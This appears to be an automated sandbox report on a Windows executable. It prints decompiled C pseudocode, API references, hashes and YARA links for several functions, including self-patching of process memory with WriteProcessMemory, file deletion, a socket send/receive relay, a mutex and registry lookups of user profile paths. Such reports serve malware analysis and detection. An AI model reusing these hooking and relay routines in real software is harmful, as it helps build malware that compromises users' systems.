							if(VirtualQueryEx(0xffffffff, _t48, _t54 + 0x24, 0x1c) == 0 ||  *((intOrPtr*)(_t54 + 0x30)) != 0x1000 || ( *(_t54 + 0x34) & 0x00000101) != 0) {
								L12:
								 *((char*)(_t54 + 0x13)) = 0;
							} else {
								_t38 =  *((intOrPtr*)(_t54 + 0x2c));
								_t29 = _t48 -  *((intOrPtr*)(_t54 + 0x20));
								if(_t38 <= _t29 || _t38 - _t29 < 0x1e || VirtualProtectEx(0xffffffff, _t48, 0x1e, 0x40, _t54 + 0x14) == 0) {
									goto L12;
								} else {
									if(WriteProcessMemory(0xffffffff, _t48,  *(_t54 + 0x1c), _t51 + 0xfffffffb, 0) != 0) {
										_t35 = 1;
									}
									VirtualProtectEx(0xffffffff, _t48, 0x1e,  *(_t54 + 0x14), _t54 + 0x14);
									if(_t35 == 0) {
										goto L12;
									}
								}
							}
						}
						_t45 =  &(_t45[4]);
						_t19 = _t54 + 0x18;
						 *_t19 =  *((intOrPtr*)(_t54 + 0x18)) - 1;
					} while ( *_t19 != 0);
					return  *((intOrPtr*)(_t54 + 0x13));
				}
			}

0x0041e405
0x0041e40b
0x0041e4e0
0x0041e411
0x0041e415
0x0041e418
0x0041e420
0x0041e420
0x0041e422
0x0041e428
0x0041e42e
0x0041e431
0x0041e43f
0x0041e449
0x0041e4bd
0x0041e4bd
0x0041e45f
0x0041e45f
0x0041e465
0x0041e46b
0x00000000
0x0041e48a
0x0041e4a0
0x0041e4a2
0x0041e4a2
0x0041e4b3
0x0041e4bb
0x00000000
0x00000000
0x0041e4bb
0x0041e46b
0x0041e449
0x0041e4c2
0x0041e4c5
0x0041e4c5
0x0041e4c5
0x0041e4da
0x0041e4da

APIs

VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000000,00000000,00000000,00000034,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041E441
VirtualProtectEx.KERNEL32(000000FF,?,0000001E,00000040,?), ref: 0041E480
WriteProcessMemory.KERNEL32(000000FF,?,?,?,00000000), ref: 0041E498
VirtualProtectEx.KERNEL32(000000FF,?,0000001E,?,?), ref: 0041E4B3

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$Protect$MemoryProcessQueryWrite
String ID:
API String ID: 2789181485-0
Opcode ID: 7a0c03d3d6e79830e399005db06f5ec813b91e252e59d85571f7593f1b7d7b02
Instruction ID: 5087ebbf1e5c8b032eb83d5e504447726f074ccf0d69ba90f81f4e95aab1426b
Opcode Fuzzy Hash: 7a0c03d3d6e79830e399005db06f5ec813b91e252e59d85571f7593f1b7d7b02
Instruction Fuzzy Hash: A721D6352043526BD710CA26DD44AEBBBD8AB85760F440B19FDE4972D0D378D988C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040B280, Relevance: 6.1, APIs: 4, Instructions: 72
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040B280(WCHAR* __ecx, void* __edx, void* __edi) {
				void* __esi;
				void* __ebp;
				WCHAR* _t16;
				void* _t18;
				void* _t24;
				void* _t28;
				WCHAR* _t30;
				signed int _t39;
				void* _t40;
				void* _t41;
				short _t47;
				WCHAR* _t49;

				_t40 = __edi;
				_t30 = __ecx;
				_t16 = __edx + 0x2c;
				if(_t16 == 0) {
					L5:
					_t18 = PathCombineW( &(_t49[4]), _t30, _t16);
					__eflags = _t18;
					if(_t18 == 0) {
						L17:
						return 1;
					}
					_t47 = _t49[0x108];
					__eflags =  *_t47 & 0x00000002;
					if(__eflags == 0) {
						L15:
						__eflags =  *_t47 & 0x00000001;
						if(( *_t47 & 0x00000001) != 0) {
							SetFileAttributesW( &(_t49[2]), 0x80);
							DeleteFileW(_t49);
						}
						goto L17;
					}
					_t28 = E0040B060( &(_t49[4]), _t40, _t47, __eflags);
					__eflags = _t28;
					if(_t28 == 0) {
						L14:
						goto L15;
					}
					_push(_t40);
					_t41 = 0;
					__eflags =  *_t28;
					if( *_t28 == 0) {
						L11:
						_t44 = _t47 + 4;
						_t24 = E00410740( *(_t47 + 8) + _t41, _t47 + 4);
						__eflags = _t24;
						if(_t24 != 0) {
							E00410820( *(_t47 + 8) +  *_t44, _t28, _t41);
							_t11 = _t47 + 8;
							 *_t11 =  *(_t47 + 8) + _t41;
							__eflags =  *_t11;
						}
						HeapFree( *0x42e6d4, 0, _t28);
						goto L14;
					}
					do {
						_t41 = _t41 + 1;
						__eflags =  *((char*)(_t41 + _t28));
					} while ( *((char*)(_t41 + _t28)) != 0);
					goto L11;
				}
				while(1) {
					_t39 =  *_t16 & 0x0000ffff;
					if(_t39 != 0x5c && _t39 != 0x2f) {
						goto L5;
					}
					_t16 =  &(_t16[1]);
				}
				goto L5;
			}

0x0040b280
0x0040b280
0x0040b280
0x0040b28b
0x0040b2a2
0x0040b2a9
0x0040b2af
0x0040b2b1
0x0040b33c
0x0040b344
0x0040b344
0x0040b2b8
0x0040b2bf
0x0040b2c3
0x0040b31b
0x0040b31b
0x0040b320
0x0040b32c
0x0040b336
0x0040b336
0x00000000
0x0040b320
0x0040b2cf
0x0040b2d1
0x0040b2d3
0x0040b31a
0x00000000
0x0040b31a
0x0040b2d6
0x0040b2d7
0x0040b2d9
0x0040b2dc
0x0040b2e7
0x0040b2ea
0x0040b2ef
0x0040b2f4
0x0040b2f6
0x0040b300
0x0040b305
0x0040b305
0x0040b305
0x0040b305
0x0040b312
0x00000000
0x0040b319
0x0040b2e0
0x0040b2e0
0x0040b2e1
0x0040b2e1
0x00000000
0x0040b2e0
0x0040b290
0x0040b290
0x0040b296
0x00000000
0x00000000
0x0040b29d
0x0040b29d
0x00000000

APIs

PathCombineW.SHLWAPI(?,?,?), ref: 0040B2A9
HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 0040B312
SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 0040B32C
DeleteFileW.KERNEL32(?,?,?), ref: 0040B336

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCombineDeleteFreeHeapPath
String ID:
API String ID: 2744584418-0
Opcode ID: 0fa31b30016dc17c23a1a45a2b8e580b32f8b73560c6130c8aab377b192498ea
Instruction ID: 9aed8ab239d8485c5d08dcf305e0590ef5dcced0a6a5fb5090f95e4ab1efcc91
Opcode Fuzzy Hash: 0fa31b30016dc17c23a1a45a2b8e580b32f8b73560c6130c8aab377b192498ea
Instruction Fuzzy Hash: C5213271100308ABDB209F21CC88BAF3B98EF91344F04843EF855AA2D2D738D882C79C

Uniqueness

Uniqueness Score: -1.00%

Function 0040F794, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F794(void* __eax, short _a4, char _a442) {
				short _v4;
				void* _t24;
				WCHAR* _t28;
				int _t29;
				signed int _t30;
				WCHAR* _t31;
				signed char _t36;
				signed char _t40;
				signed int _t45;
				int _t48;
				void* _t50;

				_t24 = __eax;
				while(1) {
					_t36 =  *((intOrPtr*)(_t24 + 0x42eb70));
					_t40 =  *((intOrPtr*)(_t50 + _t24 + 0xa8));
					if(_t36 != _t40) {
						break;
					}
					_t24 = _t24 + 1;
					if(_t24 < 0x10) {
						continue;
					} else {
						L5:
						_t28 =  *0x42e954;
						_t45 = 0;
						if(_t28 != 0 &&  *_t28 != 0) {
							do {
								_t45 = _t45 + 1;
							} while (_t28[_t45] != 0);
						}
						_t48 = 0;
						if( *0x42e958 != 0) {
							do {
								_t48 = _t48 + 1;
							} while (0x42e958[_t48] != 0);
						}
						_t29 = 0;
						if(_a442 != 0) {
							do {
								_t29 = _t29 + 1;
							} while ( *((char*)(_t50 + _t29 + 0x1be)) != 0);
						}
						_t30 = MultiByteToWideChar(0, 0,  &_a442, _t29,  &_a4, 0x14);
						if(_t30 >= 0x14) {
							_t30 = 0;
						}
						 *((short*)(_t50 + 8 + _t30 * 2)) = 0;
						if(_t45 <= _t48) {
							L22:
							return 0;
						} else {
							_t31 =  *0x42e954;
							if(_t31[_t48] != 0x5c || StrCmpNIW(0x42e958, _t31, _t48) != 0 || lstrcmpiW( &_v4,  *0x42e954 + 2 + _t48 * 2) != 0) {
								goto L22;
							} else {
								return 1;
							}
						}
					}
					L23:
				}
				if((_t36 & 0x000000ff) != (_t40 & 0x000000ff)) {
					goto L22;
				} else {
					goto L5;
				}
				goto L23;
			}

0x0040f794
0x0040f7a0
0x0040f7a0
0x0040f7a6
0x0040f7af
0x00000000
0x00000000
0x0040f7b1
0x0040f7b5
0x00000000
0x0040f7b7
0x0040f7c7
0x0040f7c7
0x0040f7cd
0x0040f7d1
0x0040f7d8
0x0040f7d8
0x0040f7d9
0x0040f7d8
0x0040f7e0
0x0040f7e9
0x0040f7f0
0x0040f7f0
0x0040f7f1
0x0040f7f0
0x0040f7fc
0x0040f805
0x0040f810
0x0040f810
0x0040f811
0x0040f810
0x0040f82f
0x0040f838
0x0040f83a
0x0040f83a
0x0040f840
0x0040f846
0x0040f889
0x0040f892
0x0040f848
0x0040f848
0x0040f852
0x00000000
0x0040f87f
0x0040f888
0x0040f888
0x0040f852
0x0040f846
0x00000000
0x0040f7b5
0x0040f7c1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000014,?,00000000,000001E6,?,0042EB80,000001E6,?,?,00000102,0042EB80), ref: 0040F82F
StrCmpNIW.SHLWAPI(0042E958,?,C4815E01,?,00000000,?,?,00000016,?,?,00000000), ref: 0040F85B
lstrcmpiW.KERNEL32(?,?,?,00000016,?,?,00000000), ref: 0040F875

Strings

u5VPhXB, xrefs: 0040F852

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWidelstrcmpi
String ID: u5VPhXB
API String ID: 1977948566-1119068662
Opcode ID: 4b43e575396729a55a51bb0537cf2cd1d528a164f7cf9cc0cbea9c675f2a9b67
Instruction ID: 6a7240792a6a24bb87d7d0d2e98e0b66d463106aa7d635942b5b74e9654a4ec4
Opcode Fuzzy Hash: 4b43e575396729a55a51bb0537cf2cd1d528a164f7cf9cc0cbea9c675f2a9b67
Instruction Fuzzy Hash: 8321D7316042419DE734A725DC44BB777E5BB85780F90887BD486E3AD1E77888CE839B

Uniqueness

Uniqueness Score: -1.00%

Function 00410C40, Relevance: 6.1, APIs: 4, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00410C40(char* __ebx, char** __edi, void* _a4) {
				void* _t9;
				signed int _t10;
				void* _t12;
				int _t14;
				char* _t17;
				long _t18;
				char** _t25;
				void* _t27;

				_t25 = __edi;
				_t17 = __ebx;
				_t9 = 0;
				if(__ebx != 0 &&  *__ebx != 0) {
					do {
						_t9 = _t9 + 1;
					} while ( *((char*)(_t9 + __ebx)) != 0);
				}
				_t2 = _t9 + 5; // 0x6
				_t27 = _t2;
				while(1) {
					_t27 = _t27 + 0x200;
					_t3 = _t27 - 5; // -511
					_t10 = _t3;
					if(_t10 > 0xa00000) {
						break;
					}
					_t12 =  *_t25;
					_t4 = _t27 - 4; // -510
					_t18 = _t4;
					if(_t18 != 0) {
						_push(_t27);
						if(_t12 != 0) {
							_t10 = HeapReAlloc( *0x42e6d4, 8, _t12, ??);
						} else {
							_t10 = HeapAlloc( *0x42e6d4, 8, ??);
						}
						if(_t10 == 0) {
							break;
						} else {
							 *_t25 = _t10;
							goto L15;
						}
					} else {
						if(_t12 != 0) {
							HeapFree( *0x42e6d4, _t18, _t12);
						}
						 *_t25 = 0;
						L15:
						_t6 = _t27 - 5; // -512
						_t14 = wvnsprintfA( *_t25, _t6, _t17, _a4);
						if(_t14 < 0) {
							continue;
						} else {
							_t7 = _t27 - 6; // -513
							if(_t14 >= _t7) {
								continue;
							} else {
								( *_t25)[_t14] = 0;
								return _t14;
							}
						}
					}
					L19:
				}
				return _t10 | 0xffffffff;
				goto L19;
			}

0x00410c40
0x00410c40
0x00410c40
0x00410c44
0x00410c50
0x00410c50
0x00410c51
0x00410c50
0x00410c5f
0x00410c5f
0x00410c62
0x00410c62
0x00410c68
0x00410c68
0x00410c70
0x00000000
0x00000000
0x00410c72
0x00410c74
0x00410c74
0x00410c79
0x00410c96
0x00410c99
0x00410cb5
0x00410c9b
0x00410ca3
0x00410ca3
0x00410cbd
0x00000000
0x00410cbf
0x00410cbf
0x00000000
0x00410cbf
0x00410c7b
0x00410c7d
0x00410c88
0x00410c88
0x00410c8e
0x00410cc1
0x00410cc9
0x00410cce
0x00410cd2
0x00000000
0x00410cd4
0x00410cd4
0x00410cd9
0x00000000
0x00410cdb
0x00410cde
0x00410ce3
0x00410ce3
0x00410cd9
0x00410cd2
0x00000000
0x00410c79
0x00410ceb
0x00000000

APIs

HeapFree.KERNEL32(?,-000001FF,-00000200,00000000,77E49EB0,00411E8E,?,?,00000000,00000000,?,004078E8,?), ref: 00410C88
HeapAlloc.KERNEL32(?,00000008,-000001FB,00000000,77E49EB0,00411E8E,?,?,00000000,00000000,?,004078E8,?), ref: 00410CA3
HeapReAlloc.KERNEL32(?,00000008,-00000200,-000001FB,00000000,77E49EB0,00411E8E,?,?,00000000,00000000,?,004078E8,?), ref: 00410CB5
wvnsprintfA.SHLWAPI(?,-00000200,?,?), ref: 00410CCE

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Alloc$Freewvnsprintf
String ID:
API String ID: 630057495-0
Opcode ID: 020e7efc529a9a10a73c7966799eaa7eed9dff2dc0a2d0e09c41965c6cdc5a69
Instruction ID: e910a2a3723fe0276ef8b823eb73161f728320d5f02b6a1a8c37e1aa80f77de7
Opcode Fuzzy Hash: 020e7efc529a9a10a73c7966799eaa7eed9dff2dc0a2d0e09c41965c6cdc5a69
Instruction Fuzzy Hash: DE2142712002019FE728CB55DD84FA777A9AB64340F54462AE941DB291F7B4D9C1CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00423FB0, Relevance: 6.1, APIs: 4, Instructions: 67
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423FB0(void* __ecx, void* __edx, void* __eflags) {
				char _v3;
				unsigned int _v128;
				char _v804;
				unsigned int _t8;
				long _t11;
				long _t15;
				long _t16;
				long _t17;
				long _t29;
				long _t35;
				void* _t39;

				_t39 = E0041CDD0(__eflags, 0x909011a5, 2);
				if(_t39 != 0) {
					E0041D150( &_v804);
					_t8 = _v128;
					_t29 = (_t8 & 0x0000ffff) * 0xea60;
					_t35 = (_t8 >> 0x10) * 0xea60;
					E00410870( &_v804,  &_v804, 0, 0x31c);
					_t11 = WaitForSingleObject( *0x42edbc, 0);
					__eflags = _t11;
					if(_t11 != 0) {
						do {
							_t15 = E00423DA0(0);
							__eflags = _t15;
							_t16 = _t35;
							if(_t15 == 0) {
								_t16 = _t29;
							}
							_t17 = WaitForSingleObject( *0x42edbc, _t16);
							__eflags = _t17 - 0x102;
						} while (_t17 == 0x102);
					}
					ReleaseMutex(_t39);
					CloseHandle(_t39);
					__eflags = 0;
					return 0;
				} else {
					_t1 =  &_v3; // 0x1
					return _t1;
				}
			}

0x00423fcc
0x00423fd0
0x00423fe3
0x00423fe8
0x00423ffb
0x00424009
0x0042400f
0x00424023
0x00424025
0x00424027
0x00424030
0x00424032
0x00424037
0x00424039
0x0042403b
0x0042403d
0x0042403d
0x00424047
0x00424049
0x00424049
0x00424030
0x00424051
0x00424058
0x0042405f
0x00424067
0x00423fd2
0x00423fd2
0x00423fdc
0x00423fdc

APIs

Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39

WaitForSingleObject.KERNEL32(?,00000000,909011A5,00000000,0000031C,909011A5,00000002), ref: 00424023
WaitForSingleObject.KERNEL32(?,?,00000000), ref: 00424047
ReleaseMutex.KERNEL32(00000000), ref: 00424051
CloseHandle.KERNEL32(00000000), ref: 00424058

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseHandleMutex$CreateRelease
String ID:
API String ID: 270228696-0
Opcode ID: a2e6abad1cd5a8bd885f6be7e84c8dce7db3d5762f4b9a39810578a0e655f202
Instruction ID: db4623a186fb94fe5e0fec0959821e9de9bea0bb1aa5d6f6eb18c92868a0dc93
Opcode Fuzzy Hash: a2e6abad1cd5a8bd885f6be7e84c8dce7db3d5762f4b9a39810578a0e655f202
Instruction Fuzzy Hash: 1B11E73374421C5BD330AA99BC46FE7B75CE785350F80053BFA04D31D1D669A94086A9

Uniqueness

Uniqueness Score: -1.00%

Function 004150D0, Relevance: 6.1, APIs: 4, Instructions: 65networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 004150FA
recv.WS2_32(00000000,?,00000400,00000000), ref: 00415141
send.WS2_32(?,?,00000000,00000000), ref: 0041515A
select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 0041518F

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: select$recvsend
String ID:
API String ID: 1283675226-0
Opcode ID: 159d10671631e970fd36d111d25f2d22f2270298a80e6d6dd62f4c6e117d3b36
Instruction ID: 2b5e02b864ae49c384870267722eb7457ec9471f6cb179a45722fcce497d2eb7
Opcode Fuzzy Hash: 159d10671631e970fd36d111d25f2d22f2270298a80e6d6dd62f4c6e117d3b36
Instruction Fuzzy Hash: 13218C72A44704BFD2209F10DD89BEFB7A5FBC4704F50492DF2859A290C2749984CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECC0, Relevance: 6.1, APIs: 4, Instructions: 64
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ECC0() {
				void* _t6;
				void* _t9;
				void* _t10;
				void* _t12;

				if( *0x42e7f0 < 0x40) {
					if(E0040EAB0 == 0) {
						L6:
						_t12 = 1;
						L7:
						if( *0x42e7f0 < 0x40) {
							if(E0040EB40 == 0) {
								L13:
								_t6 = 1;
								L14:
								if(_t12 != 0 || _t6 != 0) {
									return 1;
								} else {
									return 0;
								}
							}
							_t9 = CreateThread(0, 0, E0040EB40, 0, 0, 0);
							if(_t9 != 0) {
								 *(0x42e7f4 + ( *0x42e7f0 & 0x000000ff) * 4) = _t9;
								 *0x42e7f0 =  *0x42e7f0 + 1;
								goto L13;
							}
							_t6 = 0;
							goto L14;
						}
						SetLastError(0x9b);
						_t6 = 0;
						goto L14;
					}
					_t10 = CreateThread(0, 0, E0040EAB0, 0, 0, 0);
					if(_t10 != 0) {
						 *(0x42e7f4 + ( *0x42e7f0 & 0x000000ff) * 4) = _t10;
						 *0x42e7f0 =  *0x42e7f0 + 1;
						goto L6;
					}
					_t12 = 0;
					goto L7;
				}
				SetLastError(0x9b);
				_t12 = 0;
				goto L7;
			}

0x0040ecd6
0x0040ecea
0x0040ed19
0x0040ed19
0x0040ed1b
0x0040ed22
0x0040ed36
0x0040ed65
0x0040ed65
0x0040ed67
0x0040ed6c
0x0040ed7a
0x0040ed72
0x0040ed74
0x0040ed74
0x0040ed6c
0x0040ed47
0x0040ed4b
0x0040ed58
0x0040ed5f
0x00000000
0x0040ed5f
0x0040ed4d
0x00000000
0x0040ed4d
0x0040ed29
0x0040ed2b
0x00000000
0x0040ed2b
0x0040ecfb
0x0040ecff
0x0040ed0c
0x0040ed13
0x00000000
0x0040ed13
0x0040ed01
0x00000000
0x0040ed01
0x0040ecdd
0x0040ecdf
0x00000000

APIs

SetLastError.KERNEL32(0000009B,00000000,00000000,00000010,0041D684,0042E7F0,00000000,00000104), ref: 0040ECDD
CreateThread.KERNEL32 ref: 0040ECFB
SetLastError.KERNEL32(0000009B,00000000,00000000,00000010,0041D684,0042E7F0,00000000,00000104), ref: 0040ED29
CreateThread.KERNEL32 ref: 0040ED47

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastThread
String ID:
API String ID: 1689873465-0
Opcode ID: 00a0ac704a9d0a68a76711654c655f9526b43a4901fc3e09fc3e03fca50423d5
Instruction ID: 649fe66f57757ce21a8e73f0fe2976c80e8039452ddb20686e5749908ba3b627
Opcode Fuzzy Hash: 00a0ac704a9d0a68a76711654c655f9526b43a4901fc3e09fc3e03fca50423d5
Instruction Fuzzy Hash: D61182B538435272EB3017372D12F622A44EB92B44F290CB7E681B72D5E2FE6423566D

Uniqueness

Uniqueness Score: -1.00%

Function 0041C780, Relevance: 6.1, APIs: 4, Instructions: 60
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041C780(void* __eax, signed char _a4) {
				short _v520;
				signed int _t16;
				signed int _t17;
				signed int _t19;
				short* _t30;

				_t30 =  &_v520;
				if((_a4 & 0x00000001) != 0) {
					L4:
					_t16 = GetModuleFileNameW(0,  &_v520, 0x104);
					if(_t16 == 0xffffffff) {
						_t16 = 0;
						if(_v520 != 0) {
							do {
								_t16 = _t16 + 1;
							} while (_t30[_t16] != 0);
						}
					}
					_t8 = _t16 + _t16 + 2; // 0x2
					_t17 = _t8;
					if(_t17 != 0) {
						_t19 = HeapAlloc( *0x42e6d4, 8, _t17 + 4);
						if(_t19 != 0) {
							_t19 = E00410820(_t19,  &_v520, _t27);
						}
						 *0x42e954 = _t19;
						return _t19 & 0xffffff00 | _t19 != 0x00000000;
					} else {
						 *0x42e954 = _t17;
						return _t17 & 0xffffff00 | _t17 != 0x00000000;
					}
				} else {
					__imp__SHGetFolderPathW(0, 0x1a, 0, 0, 0x42e958);
					if(__eax == 0) {
						PathRemoveBackslashW(0x42e958);
						goto L4;
					} else {
						return 0;
					}
				}
			}

0x0041c780
0x0041c78e
0x0041c7bd
0x0041c7c9
0x0041c7d2
0x0041c7d4
0x0041c7da
0x0041c7e0
0x0041c7e0
0x0041c7e1
0x0041c7e0
0x0041c7da
0x0041c7ec
0x0041c7ec
0x0041c7f1
0x0041c814
0x0041c81c
0x0041c825
0x0041c825
0x0041c82c
0x0041c83b
0x0041c7f3
0x0041c7f5
0x0041c804
0x0041c804
0x0041c790
0x0041c79d
0x0041c7a5
0x0041c7b7
0x00000000
0x0041c7a7
0x0041c7af
0x0041c7af
0x0041c7a5

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,0042E958), ref: 0041C79D
PathRemoveBackslashW.SHLWAPI(0042E958), ref: 0041C7B7
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0041C7C9
HeapAlloc.KERNEL32(?,00000008,-00000002,00000000), ref: 0041C814

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$AllocBackslashFileFolderHeapModuleNameRemove
String ID:
API String ID: 3626861879-0
Opcode ID: 532cbc6d90fd4752e845776e459543a4e2f87c5fa0cf2a9a6e69e2194653e2ad
Instruction ID: b105a6255c463b67ff6f57ddc1b37d67a280c4cd082ec66d50b8c91d03caaec9
Opcode Fuzzy Hash: 532cbc6d90fd4752e845776e459543a4e2f87c5fa0cf2a9a6e69e2194653e2ad
Instruction Fuzzy Hash: 40113A717403016BE760A720DD8AFE773A8AB50700F00453AFA61E11E0E7B8C5D4C75E

Uniqueness

Uniqueness Score: -1.00%

Function 00410670, Relevance: 6.1, APIs: 4, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00410670(void* __ecx) {
				WCHAR* _v4;
				short _v528;
				char _v648;
				char _v680;
				char _v684;
				void* _v688;
				void* __esi;
				char* _t13;
				void* _t22;
				signed int _t26;

				_t13 =  &_v680;
				_t26 = 0;
				__imp__ConvertSidToStringSidW(__ecx, _t13);
				if(_t13 != 0) {
					_t38 =  &_v648;
					E00424100(4,  &_v648);
					_push(_v688);
					if(E00411D10( &_v648, 0x104,  &_v528, _t38) > 0) {
						E00424100(5,  &_v684);
						_t22 = E00416420(0x80000002,  &_v528,  &_v684, 0x104);
						if(_t22 != 0 && _t22 != 0xffffffff) {
							PathUnquoteSpacesW( &_v528);
							_t26 = 0 | ExpandEnvironmentStringsW( &_v528, _v4, 0x104) - 0x00000001 - 0x00000103 < 0x00000000;
						}
					}
					LocalFree(_v688);
				}
				return _t26;
			}

0x00410677
0x0041067d
0x0041067f
0x00410687
0x0041068e
0x00410697
0x004106a0
0x004106ba
0x004106c5
0x004106e1
0x004106e8
0x004106f7
0x0041071e
0x0041071e
0x004106e8
0x00410726
0x0041072c
0x00410736

APIs

ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 0041067F
LocalFree.KERNEL32(?,?,00000000), ref: 00410726

Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B

PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,?,00000000), ref: 004106F7
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000), ref: 00410712

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseConvertEnvironmentExpandFreeLocalOpenPathQuerySpacesStringStringsUnquoteValue
String ID:
API String ID: 2962224238-0
Opcode ID: dc708aef3a6e9f64ac2ddfbf429aefba90b23ebbf203f0ebfffdabfd0c33c4e6
Instruction ID: 4e3aefb6fc1b8a5617357f4c4a0f98a70afb978300c6d886c4f6da98ef5de03e
Opcode Fuzzy Hash: dc708aef3a6e9f64ac2ddfbf429aefba90b23ebbf203f0ebfffdabfd0c33c4e6
Instruction Fuzzy Hash: B411CAB62042516BD710E754EC45BDB7799EB84300F10492EBA99D32A0D678E888CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00418160, Relevance: 6.0, APIs: 4, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00418160(WCHAR* __eax) {
				char _v12;
				void* _v16;
				intOrPtr _v20;
				void* _t5;
				signed int _t10;
				signed int _t11;
				signed int _t16;
				signed int _t17;
				void* _t19;

				_t17 = _t16 | 0xffffffff;
				_t11 = _t10 | 0xffffffff;
				_t5 = CreateFileW(__eax, 0x80000000, 7, 0, 3, 0, 0);
				_t19 = _t5;
				if(_t19 == 0xffffffff) {
					L4:
					return _t17;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t5 == 0) {
						_t17 = _t17 | 0xffffffff;
						_t11 = _t11 | 0xffffffff;
						CloseHandle(_t19);
						goto L4;
					} else {
						CloseHandle(_t19);
						return _v20;
					}
				}
			}

0x00418176
0x00418179
0x0041817c
0x00418182
0x00418187
0x004181c0
0x004181ca
0x00418189
0x0041818f
0x00418197
0x004181b4
0x004181b7
0x004181ba
0x00000000
0x00418199
0x004181a2
0x004181b2
0x004181b2
0x00418197

APIs

